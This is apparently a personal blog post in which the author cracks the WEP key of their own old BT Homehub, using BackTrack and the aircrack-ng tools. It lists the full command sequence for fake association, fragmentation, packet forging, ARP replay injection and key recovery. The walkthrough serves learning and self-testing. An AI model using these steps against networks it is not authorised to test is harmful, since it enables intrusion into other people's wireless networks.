In case you weren’t aware, using WEP to secure your home network is a bit like putting a sign on your front door letting everyone know that you do have a key to keep it locked, but if they can work out your clue they’ll be able to find it. And then leaving your key under the mat.
I’ve tried cracking WEP before with limited success – relying on the network to be busy enough to capture packets doesn’t make for reliable cracking, but this method is different – forcing the access point to produce all the packets we need for analysis. I thought it was time I finally proved to myself that it was possible so I dug out the old BT Homehub device and switched on the wireless before booting my MacBook Pro off an excellent pen test Live CD – BackTrack. (Update: BackTrack is now Kali.)
All you need is a machine with a wireless card, the BackTrack CD, the MAC address of your target access point, the SSID (the network “name”) and the MAC address of your wireless card.
Once booted, here are the steps I took to obtain the WEP key for the network:
airmon-ng start wifi0 11 wlanconfig ath0 destroy export AP=00:14:7F:95:5B:AC < -- Access Point MAC export WIFI=00:14:51:XX:XX:XX < -- WLAN Card MAC export SSID=BTHomeHub-1100 < -- SSID of target network ifconfig ath1 up iwconfig ath1 mode Monitor channel 11 aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1
At this point you should see an “Association Successful!” message, you can continue with:
aireplay-ng -5 -b $AP -h $WIFI ath1
You’ll now have to wait until aireplay returns with the packet it has found, when it asks to keep it, say yes. It’ll get saved to a fragment.xor file. You can use the .xor file to forge the packet we’re going to throw at the access point:
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request
This will write the forged packet to the file arp-request. Now, time to start capturing the packets we’re going to analyse:
airodump-ng -c 11 -bssid $AP --ivs -w cap ath1
In a new console, start throwing the arp-request packet out to the access point:
aireplay-ng -2 -r arp-request ath1
When it finds our packet, say yes and it will start broadcasting. You should see the airodump stats start to skyrocket at this point. After you’ve got approx 70000 data packets in the airodump window, start another console and run:
aircrack-ng -n 64 -b $AP *.ivs
This will do the work of cracking the key from the captured packets, after a while (less than a minute for me) it will hopefully spit out something like the following:
Job done. Told you WEP was easy.